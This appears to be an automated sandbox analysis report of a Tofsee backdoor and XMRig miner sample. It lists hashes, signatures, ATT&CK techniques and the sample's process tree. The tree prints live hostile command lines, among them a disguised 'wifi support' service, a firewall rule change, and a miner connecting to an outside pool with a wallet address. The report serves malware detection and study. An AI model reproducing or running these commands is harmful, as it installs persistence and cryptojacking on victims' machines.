Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    16-07-2021 06:09

General

  • Target

    cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64.exe

  • Size

    13.7MB

  • MD5

    31f47d08ddb80472b7c66a253cabe6be

  • SHA1

    fc694ea2c7afd8c8da90277310a6ab766954144e

  • SHA256

    cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64

  • SHA512

    8ee742756fdfd592b9504f73b7dc28cd06919d8c900a708b4a8b85ccb230de4a0e07f1469c0b52827fb5dc6982a47674f6ece249a8ec0669b378b4544d01cb4b

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64.exe
    "C:\Users\Admin\AppData\Local\Temp\cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\icxmmqvw\
      2⤵
        PID:908
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\logidtxe.exe" C:\Windows\SysWOW64\icxmmqvw\
        2⤵
          PID:1492
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create icxmmqvw binPath= "C:\Windows\SysWOW64\icxmmqvw\logidtxe.exe /d\"C:\Users\Admin\AppData\Local\Temp\cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:784
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description icxmmqvw "wifi internet conection"
            2⤵
              PID:368
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start icxmmqvw
              2⤵
                PID:988
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1548
              • C:\Windows\SysWOW64\icxmmqvw\logidtxe.exe
                C:\Windows\SysWOW64\icxmmqvw\logidtxe.exe /d"C:\Users\Admin\AppData\Local\Temp\cf76b458a0d294caf87cfc6d6c0f0269fe4d0b5a149c11933dc3f5897ef8bd64.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1852
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1336
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:524

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\logidtxe.exe
                MD5

                6236ba233a9930f00c44ad47fa47abe9

                SHA1

                9ee5de8a1913fbac127ea6732b6482e006dc2463

                SHA256

                796c49db09e84497d35383a8281b719d2e6c435c1502d0db379f8f1c9a7ad39c

                SHA512

                b20b831a1352c9c2af2ad4d317687ed9b577f5a352dd2f8f3cf8922e79b847cc4fcd4d1f3165d8e322487f8c9b148ed26dd8c644725282d9cd433b4c119ef63f

              • C:\Windows\SysWOW64\icxmmqvw\logidtxe.exe
                MD5

                6236ba233a9930f00c44ad47fa47abe9

                SHA1

                9ee5de8a1913fbac127ea6732b6482e006dc2463

                SHA256

                796c49db09e84497d35383a8281b719d2e6c435c1502d0db379f8f1c9a7ad39c

                SHA512

                b20b831a1352c9c2af2ad4d317687ed9b577f5a352dd2f8f3cf8922e79b847cc4fcd4d1f3165d8e322487f8c9b148ed26dd8c644725282d9cd433b4c119ef63f

              • memory/368-67-0x0000000000000000-mapping.dmp
              • memory/524-87-0x000000000025259C-mapping.dmp
              • memory/524-83-0x00000000001C0000-0x00000000002B1000-memory.dmp
                Filesize

                964KB

              • memory/784-66-0x0000000000000000-mapping.dmp
              • memory/908-61-0x0000000000000000-mapping.dmp
              • memory/988-68-0x0000000000000000-mapping.dmp
              • memory/1336-74-0x00000000000C9A6B-mapping.dmp
              • memory/1336-73-0x00000000000C0000-0x00000000000D5000-memory.dmp
                Filesize

                84KB

              • memory/1336-77-0x0000000001C70000-0x0000000001E7F000-memory.dmp
                Filesize

                2.1MB

              • memory/1336-79-0x00000000004D0000-0x00000000004D6000-memory.dmp
                Filesize

                24KB

              • memory/1336-81-0x0000000000520000-0x0000000000530000-memory.dmp
                Filesize

                64KB

              • memory/1492-62-0x0000000000000000-mapping.dmp
              • memory/1548-70-0x0000000000000000-mapping.dmp
              • memory/1756-65-0x0000000000400000-0x0000000000450000-memory.dmp
                Filesize

                320KB

              • memory/1756-60-0x0000000075FE1000-0x0000000075FE3000-memory.dmp
                Filesize

                8KB

              • memory/1756-64-0x0000000000220000-0x0000000000233000-memory.dmp
                Filesize

                76KB

              • memory/1852-76-0x0000000000400000-0x0000000000450000-memory.dmp
                Filesize

                320KB